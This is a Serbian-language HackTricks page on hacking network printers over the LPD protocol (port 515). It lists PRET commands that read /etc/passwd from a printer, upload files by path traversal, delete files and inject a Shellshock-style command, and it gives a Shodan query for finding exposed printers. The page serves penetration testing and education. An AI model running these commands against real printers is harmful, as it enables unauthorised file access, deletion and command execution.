Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
* Ako želite videti **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
### **Uvod u LPD protokol**
U 1980-im godinama, razvijen je **Line Printer Daemon (LPD) protokol** u Berkeley Unix-u, koji je kasnije formalizovan kroz RFC1179. Ovaj protokol funkcioniše preko porta 515/tcp, omogućavajući interakciju putem `lpr` komande. Suština štampanja putem LPD-a uključuje slanje **kontrolnog fajla** (za specificiranje detalja posla i korisnika) zajedno sa **podacima fajla** (koji sadrži informacije za štampanje). Dok kontrolni fajl omogućava izbor **različitih formata fajlova** za podatke, rukovanje ovim fajlovima određeno je specifičnom implementacijom LPD-a. Široko priznata implementacija za Unix-slične sisteme je **LPRng**. Posebno, LPD protokol može biti iskorišćen za izvršavanje **zlonamernih PostScript** ili **PJL print poslova**.
### **Alati za interakciju sa LPD štampačima**
[**PRET**](https://github.com/RUB-NDS/PRET) uvodi dva osnovna alata, `lpdprint` i `lpdtest`, koji pružaju jednostavan način za interakciju sa LPD-kompatibilnim štampačima. Ovi alati omogućavaju različite akcije, od štampanja podataka do manipulisanja fajlovima na štampaču, kao što su preuzimanje, otpremanje ili brisanje:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
```
Za pojedince koji su zainteresovani za dalje istraživanje područja **hakovanja štampača**, sveobuhvatni resurs može se pronaći ovde: [**Hakovanje štampača**](http://hacking-printers.net/wiki/index.php/Main_Page).
# Shodan
* `port 515`
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
* Ako želite da vidite **vašu kompaniju oglašenu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje trikove hakovanja slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.